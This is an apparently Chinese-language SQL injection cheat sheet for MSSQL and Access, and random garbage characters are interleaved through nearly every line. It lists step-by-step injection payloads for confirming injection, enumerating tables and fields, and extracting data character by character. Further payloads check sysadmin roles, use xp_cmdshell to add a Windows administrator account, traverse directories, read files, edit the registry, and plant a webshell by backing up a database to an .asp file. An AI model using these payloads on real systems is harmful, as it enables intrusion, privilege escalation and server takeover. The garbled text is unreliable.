1.判断是否有注入;and 1=1 ;and 1=2 7-A�2_!_x{
2.初步判断是否是mssql ;and user>0 8cQ'dL�`(�
�t`QENXA�}
3.注入参数是字符'and [查询条件] and ''=' Bbp|!+KP{(
q� cno^8R�
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �LH6�vL�uf
�� =Br�RYA
5.判断数据库系统 K>
e7�pu��
>R=|W�o`Ri
;and (select count(*) from sysobjects)>0 mssql FiU#�T.`9'
�3�gf1ownC
;and (select count(*) from msysobjects)>0 access ��Z6m)tZVM
?@8�[e9lLD
:v 4]D4\�o
paMa�+jhQQ
6.猜数据库 ;and (select Count(*) from [数据库名])>0 FgO)�DQm��
_�vZOZKS�+
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 L�gYq.>Nl9
$od7����;%
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �T9&���1VW
�nj�4�/#W
9.(1)猜字段的ascii值(access) dqAw5[q�MJ
eDB��;�c�N
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 -{A<.a3P}=
J8D,ZfPN`d
(2)猜字段的ascii值(mssql) o"��SMb�j�
�GKCroyor
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 9!t�W.pK5
�\�j.:3X�r
10.测试权限结构(mssql) t�g/H2p^Y�
F1�hHe<��)
h7@6T+#WoT
A)�~��6�Im
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- B-��ESFATc
�"w�_aM7x_
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- ���i?;Kq~,
YbLW/�E\T�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- v8D��C21pb
��y?!"6t7&
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 4.�(���4x&
*|��l/6!WM
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- CQ2jP
G*py
<�7$�1kGlA
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ^}C���\zW�
jq�kqZ�F��
;and 1=(select IS_MEMBER('db_owner'));-- 8EE�uv-aeo
F5#YOck&,
�&?RQZHt�g
"���h ^Z
11.添加mssql和系统的帐户 a�N=B]��{!
�t���I{_y
;exec master.dbo.sp_addlogin username;-- y!%Cf�f�F2
;exec master.dbo.sp_password null,username,password;-- ?hM6�4jI�|
/�Q� )\�+�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- j~QwV='S��
Qei�"�'~1a
;exec master.dbo.xp_cmdshell 'net user username password { "E\Jcjl\
R���G�X=)�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- "*�H`HRi4T
h7�I{��
4�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �E!AE4B1bd
u]gxFG�"
�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- u2��[w�#��
kN�L\m[W8$
0?M:6zf_iv
[8*�)8�jP3
12.(1)遍历目录 ]cruF�#`�%
3�BLq���CZ
;create table dirs(paths varchar(100), id int) ��M@ZI���\
KG5�>]_�GH
;insert dirs exec master.dbo.xp_dirtree 'c:\' ]���s�748+
lHIM}~#;nd
;and (select top 1 paths from dirs)>0 �9k=3u;$v�
�v9U�D%@tZ
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) �:j�`s�r
~v"L!=~G;a
1i�] ^{;]
Z��Af7Tz\U
(2)遍历目录 fxIf�|9Qi`
sN�wI�0o��
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ��snik��n&
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 i 3S�Hg\~Z
���2����:=
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 ,v�&(Y�Od
�4Z,!zFS$`
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 _-F�s#��f8
� f
V�(�J|
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 x3krbUlx��
4H�<lm*!�^
�g�zg_>2Sj
dq[xwRU�1�
13.mssql中的存储过程 �� �rXU\��
DFTy�MB1H�
xp_regenumvalues 注册表根键, 子键 \^%}M�!tan
<�d_!mKw��
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �@OHm#�`�~
�$tS}LN_!
xp_regread 根键,子键,键值名 O�c; �G(l(
I!?�}j��o3
;exec xp_regread &!�
?e��L�
<"�|,�"hA�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 GM<-&s!�Uj
Wxe0IXq3Nn
xp_regwrite 根键,子键, 值名, 值类型, 值 e 3�TI|�e_
&8 x��-o,�
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 BVO<e \>�3
K96�<M);:g
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 !�0cD�$�^7
"-J����-k=
xp_regdeletevalue 根键,子键,值名 ?I@�W:#>o�
XSl�GE9]AG
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 o�0�v��Uj�
;d9�QAN&0}
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 xF44M]���i
I.k�
*G��W
6i��~�WcAs
7Rt9od<
)!
14.mssql的backup创建webshell %|i`kYs�y�
:Z�z
��'1C
use model o�.l��-�7�
y;H-m>*%��
create table cmd(str image); h��fy_3}�_
�d{7�+w/Zi
insert into cmd(str) values (''); �6f�*�CvW�
%�-�0t?�/>
backup database model to disk='c:\l.asp'; �A$:U'�ZG_
)T�H@#��1
�N�Pe%�F+X
"!%l�/_p?�
15.mssql内置函数 ��'CkIz"Wd
$'hEz��/�
;and (select @@version)>0 获得Windows的版本号 n#OB%@�]<V
?m?�::R��H
;and user_name()='dbo' 判断当前系统的连接用户是不是sa DZ��PPJ2�}
�5,�6"&vU,
;and (select user_name())>0 爆当前系统的连接用户 3x'�|�]�Ns
BKjS� ,2C
;and (select db_name())>0 得到当前连接的数据库 xx%�j.zDI]
SJ�>vwmA4�
�-���I,$�_
��wT8DS�q
16.简洁的webshell ����'u� |c
`,��Tz���Q
use model ��wov�\�kV
��By���Nn
create table cmd(str image); 9�e�,0��\J
JB[~;nL�lC
insert into cmd(str) values (''); )C]�g�ld;8
hp-<�2i^"!
backup database model to disk='g:\wwwtest\l.asp';
